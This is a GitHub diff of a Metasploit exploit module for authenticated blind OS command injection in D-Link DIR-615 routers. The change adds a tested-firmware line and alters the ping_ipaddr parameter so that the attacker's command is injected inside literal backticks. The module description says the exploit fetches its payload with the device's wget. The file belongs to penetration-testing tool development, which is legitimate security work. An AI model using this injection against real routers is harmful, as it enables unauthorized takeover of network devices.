File tree Expand file tree Collapse file tree 1 file changed +3
-4
lines changed
modules/exploits/linux/http Expand file tree Collapse file tree 1 file changed +3
-4
lines changed Original file line number Diff line number Diff line change @@ -22,7 +22,8 @@ def initialize(info = {})
22
22
Some D-Link Routers are vulnerable to an authenticated OS command injection.
23
23
Default credentials for the web interface are admin/admin or admin/password. Since
24
24
it is a blind os command injection vulnerability, there is no output for the
25
- executed command when using the cmd generic payload. A ping command against a
25
+ executed command when using the cmd generic payload. This module was tested against
26
+ a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
26
27
controlled system could be used for testing purposes. The exploit uses the wget
27
28
client from the device to download the payload.
28
29
} ,
@@ -77,17 +78,15 @@ def initialize(info = {})
77
78
78
79
def request ( cmd , user , pass )
79
80
#http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
80
- cmd = Rex ::Text . uri_encode ( cmd )
81
81
82
82
begin
83
83
res = send_request_cgi ( {
84
84
'uri' => @uri ,
85
85
'method' => 'GET' ,
86
- 'encode_params' => false ,
87
86
'vars_get' => {
88
87
"page" => "tools_vct" ,
89
88
"hping" => "0" ,
90
- "ping_ipaddr" => "1.1.1.1%60 #{ cmd } %60 " ,
89
+ "ping_ipaddr" => "1.1.1.1` #{ cmd } ` " ,
91
90
"ping6_ipaddr" => ""
92
91
}
93
92
} )
You can’t perform that action at this time.
0 commit comments